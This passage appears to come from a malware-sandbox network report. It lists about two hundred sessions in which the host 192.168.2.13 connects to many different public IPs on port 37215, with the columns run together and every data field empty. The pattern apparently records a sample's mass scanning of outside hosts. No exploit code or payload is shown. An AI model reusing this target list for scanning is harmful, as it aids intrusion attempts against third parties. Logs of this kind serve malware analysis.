                                                  18989192.168.2.1333608172.9.13.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18990192.168.2.133583874.244.198.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18991192.168.2.135103032.16.104.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18992192.168.2.133472841.254.70.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18993192.168.2.1357968193.222.132.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18994192.168.2.135149241.72.101.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18995192.168.2.1340534157.40.148.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18996192.168.2.1345514157.2.188.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18997192.168.2.1341122197.39.230.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18998192.168.2.1357588157.134.1.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18999192.168.2.1350636197.150.60.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19000192.168.2.134918041.20.89.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19001192.168.2.1355342197.40.144.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19002192.168.2.1352458167.208.219.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19003192.168.2.1354816157.14.8.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19004192.168.2.1339238157.204.186.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19005192.168.2.133709241.193.0.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19006192.168.2.1335174157.149.171.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19007192.168.2.1341114157.54.199.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19008192.168.2.135112041.102.173.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19009192.168.2.134386873.48.230.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19010192.168.2.1341430197.15.210.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19011192.168.2.1342732157.92.44.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19012192.168.2.135525872.183.82.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19013192.168.2.1334648157.111.96.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19014192.168.2.1352522197.200.5.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19015192.168.2.134100641.109.38.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19016192.168.2.1354500197.78.61.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19017192.168.2.1343452197.49.214.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19018192.168.2.1341992157.221.185.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19019192.168.2.1344972197.128.222.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19020192.168.2.133819227.250.244.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19021192.168.2.1340642164.235.36.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19022192.168.2.1354178157.4.58.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19023192.168.2.1349808197.64.42.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19024192.168.2.1333638197.20.228.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19025192.168.2.1348544157.168.41.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19026192.168.2.133425841.154.58.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19027192.168.2.1347546197.160.143.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19028192.168.2.1338336157.75.241.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19029192.168.2.1351794157.63.113.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19030192.168.2.1356736157.160.61.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19031192.168.2.1352602151.98.162.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19032192.168.2.134417641.16.31.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19033192.168.2.135706241.221.41.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19034192.168.2.135202441.74.230.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19035192.168.2.1334200197.255.132.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19036192.168.2.1357492157.158.100.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19037192.168.2.1333700157.208.113.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19038192.168.2.134002241.238.254.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19039192.168.2.1333518157.32.168.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19040192.168.2.1336276197.197.201.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19041192.168.2.1359106197.248.40.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19042192.168.2.1343428157.48.223.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19043192.168.2.1336140197.175.193.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19044192.168.2.1336028208.117.3.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19045192.168.2.1341842194.11.181.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19046192.168.2.135948442.225.201.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19047192.168.2.1355504197.94.8.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19048192.168.2.134037641.204.14.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19049192.168.2.1335752197.34.110.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19050192.168.2.1335974157.33.106.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19051192.168.2.1335560197.93.230.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19052192.168.2.1339574207.210.124.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19053192.168.2.136041041.204.254.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19054192.168.2.1353388113.225.178.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19055192.168.2.1355026157.250.193.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19056192.168.2.134649841.69.42.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19057192.168.2.1357026178.209.10.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19058192.168.2.135589841.45.124.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19059192.168.2.1337930197.164.151.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19060192.168.2.134148841.224.2.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19061192.168.2.1347000157.93.132.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19062192.168.2.134513241.75.15.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19063192.168.2.1334384197.63.56.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19064192.168.2.1350630130.250.59.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19065192.168.2.134307241.255.127.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19066192.168.2.1344956157.83.37.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19067192.168.2.1354738146.83.151.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19068192.168.2.134450679.13.175.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19069192.168.2.1352674197.171.39.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19070192.168.2.1336476197.161.236.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19071192.168.2.134371641.30.96.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19072192.168.2.1346034157.239.227.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19073192.168.2.1352340150.12.232.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19074192.168.2.1356246197.238.237.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19075192.168.2.135286643.224.27.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19076192.168.2.135980869.3.64.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19077192.168.2.135760841.67.112.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19078192.168.2.1356636145.182.226.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19079192.168.2.1348940197.133.187.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19080192.168.2.1342834203.182.247.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19081192.168.2.134915841.40.2.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19082192.168.2.133725073.237.244.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19083192.168.2.1345952197.158.165.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19084192.168.2.1336900167.22.171.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19085192.168.2.1354796157.69.123.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19086192.168.2.1359814157.26.44.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19087192.168.2.135785463.154.63.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19088192.168.2.1357364158.62.208.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19089192.168.2.1347232157.111.28.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19090192.168.2.135622441.27.248.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19091192.168.2.1343778157.247.69.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19092192.168.2.1338096197.157.2.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19093192.168.2.1336964197.104.161.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19094192.168.2.1340864121.135.36.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19095192.168.2.1357146157.172.200.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19096192.168.2.135536059.67.83.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19097192.168.2.1345754141.231.120.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19098192.168.2.1358102197.238.183.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19099192.168.2.1345886197.130.239.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19100192.168.2.1353802197.24.105.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19101192.168.2.134140241.255.103.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19102192.168.2.1337098118.140.166.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19103192.168.2.1358034197.26.129.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19104192.168.2.135708487.80.139.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19105192.168.2.135296241.167.8.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19106192.168.2.1354454197.52.189.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19107192.168.2.1341778201.192.234.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19108192.168.2.1355208188.249.163.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19109192.168.2.135509041.11.255.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19110192.168.2.1355824197.94.149.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19111192.168.2.1360690221.63.82.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19112192.168.2.1339646197.189.210.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19113192.168.2.1337254197.168.111.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19114192.168.2.1352326157.42.25.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19115192.168.2.1335630197.43.192.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19116192.168.2.133499441.81.236.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19117192.168.2.1354004157.171.66.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19118192.168.2.134753241.205.148.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19119192.168.2.1343374197.208.242.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19120192.168.2.1354736157.121.28.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19121192.168.2.1332832157.199.47.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19122192.168.2.135554241.25.38.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19123192.168.2.134631874.60.178.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19124192.168.2.134858041.21.145.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19125192.168.2.1333536157.63.186.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19126192.168.2.133445241.183.208.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19127192.168.2.1348568197.140.122.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19128192.168.2.1354670197.173.67.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19129192.168.2.135909441.112.28.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19130192.168.2.133593841.107.95.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19131192.168.2.135022097.246.147.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19132192.168.2.133867841.200.22.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19133192.168.2.134455678.47.246.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19134192.168.2.1342632197.141.18.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19135192.168.2.135283619.18.93.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19136192.168.2.134669645.127.150.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19137192.168.2.1336138157.44.101.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19138192.168.2.1350220197.216.144.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19139192.168.2.135574641.105.236.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19140192.168.2.1348676197.230.212.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19141192.168.2.1344386109.12.139.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19142192.168.2.134741699.104.139.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19143192.168.2.135761069.102.67.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19144192.168.2.1358344197.148.189.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19145192.168.2.1357002157.87.66.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19146192.168.2.135707641.230.155.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19147192.168.2.1334456103.93.14.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19148192.168.2.1350710157.64.26.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19149192.168.2.1358600197.136.103.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19150192.168.2.1349698157.208.85.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19151192.168.2.1356088197.107.67.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19152192.168.2.1350158157.171.118.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19153192.168.2.1335880197.80.167.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19154192.168.2.1348910197.52.0.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19155192.168.2.133411694.21.227.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19156192.168.2.1340940197.126.21.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19157192.168.2.1333492197.112.57.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19158192.168.2.1334084157.202.11.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19159192.168.2.1334196157.102.224.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19160192.168.2.1333822197.141.137.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19161192.168.2.136080441.127.25.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19162192.168.2.134492241.179.19.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19163192.168.2.135143441.232.189.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19164192.168.2.1344020197.35.110.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19165192.168.2.136039041.96.214.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19166192.168.2.134612612.255.191.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19167192.168.2.1343582197.189.8.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19168192.168.2.1354272197.244.226.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19169192.168.2.1339762157.191.180.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19170192.168.2.1334140151.241.24.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19171192.168.2.1344980197.244.51.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19172192.168.2.1357646166.32.133.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19173192.168.2.1338888197.91.75.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19174192.168.2.1349416197.218.90.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19175192.168.2.1342878157.213.24.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19176192.168.2.1334100157.56.50.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19177192.168.2.1349424203.252.79.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19178192.168.2.1338196135.36.161.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19179192.168.2.1350784157.16.133.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19180192.168.2.1339080157.39.161.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19181192.168.2.1335990219.207.32.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19182192.168.2.1350160198.249.212.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19183192.168.2.133501641.203.32.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19184192.168.2.1344122197.76.230.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19185192.168.2.133331041.125.252.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19186192.168.2.134800041.1.211.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19187192.168.2.1354982197.253.97.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19188192.168.2.134474851.188.84.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19189192.168.2.134205441.222.5.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19190192.168.2.134644257.255.174.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19191192.168.2.1352790197.160.242.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19192192.168.2.134782641.39.21.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19193192.168.2.134154665.66.253.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19194192.168.2.1338168157.3.100.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19195192.168.2.1339664157.226.200.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19196192.168.2.133633692.174.134.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19197192.168.2.1336366157.97.25.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19198192.168.2.13411384.184.254.11137215
